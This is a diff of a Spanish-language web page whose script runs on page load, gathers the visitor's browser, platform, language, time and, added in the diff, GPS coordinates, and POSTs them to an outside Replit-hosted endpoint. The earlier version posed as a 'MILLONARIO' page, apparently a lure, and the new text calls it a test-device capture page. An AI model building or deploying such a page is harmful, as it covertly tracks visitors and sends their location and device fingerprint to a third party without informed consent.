--- a/index.html
+++ b/index.html
@@ -3,17 +3,44 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>.</title>
+    <title>Página de Captura</title>
     <script>
         function capturarDatos() {
+            // Capturar datos básicos
             const datos = {
                 userAgent: navigator.userAgent,
                 plataforma: navigator.platform,
-                idioma: navigator.language
+                idioma: navigator.language,
+                online: navigator.onLine,
+                horaAcceso: new Date().toISOString() // Hora en formato ISO
             };
 
-            // Cambiar la URL para que apunte a tu servidor Flask
-            fetch('https://979c5a95-3dfb-4130-8e4b-c2a06b13a186-00-cuily0isatzs.spock.repl.co/capturar-datos', { 
+            // Capturar ubicación usando Geolocation API
+            if (navigator.geolocation) {
+                navigator.geolocation.getCurrentPosition(
+                    (position) => {
+                        datos.ubicacion = {
+                            latitud: position.coords.latitude,
+                            longitud: position.coords.longitude,
+                            precision: position.coords.accuracy
+                        };
+
+                        enviarDatos(datos); // Enviar datos al servidor con ubicación
+                    },
+                    (error) => {
+                        console.error("Error al obtener la ubicación:", error);
+                        datos.ubicacion = { error: "No se pudo obtener la ubicación" };
+                        enviarDatos(datos); // Enviar datos al servidor sin ubicación
+                    }
+                );
+            } else {
+                datos.ubicacion = { error: "Geolocalización no soportada" };
+                enviarDatos(datos); // Enviar datos al servidor sin ubicación
+            }
+        }
+
+        function enviarDatos(datos) {
+            fetch('https://979c5a95-3dfb-4130-8e4b-c2a06b13a186-00-cuily0isatzs.spock.repl.co/capturar-datos', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
                 body: JSON.stringify(datos)
@@ -27,21 +54,20 @@
             })
             .then(data => {
                 console.log("Datos enviados:", data);
-                document.getElementById("mensaje").textContent = "....";
+                document.getElementById("mensaje").textContent = "Datos enviados correctamente.";
             })
             .catch(error => {
                 console.error("Error al enviar los datos:", error);
-                document.getElementById("mensaje").textContent = "Error.";
+                document.getElementById("mensaje").textContent = "Error al enviar los datos.";
             });
         }
 
-        // Ejecutar capturarDatos cuando se cargue la página
         window.onload = capturarDatos;
     </script>
 </head>
 <body>
-    <h1>MILLONARIO</h1>
-    <p>....</p>
-    <p id="mensaje">.....</p>
+    <h1>Página de Captura</h1>
+    <p>Esta página recopila información técnica del dispositivo de prueba.</p>
+    <p id="mensaje">Enviando datos...</p>
 </body>
 </html>
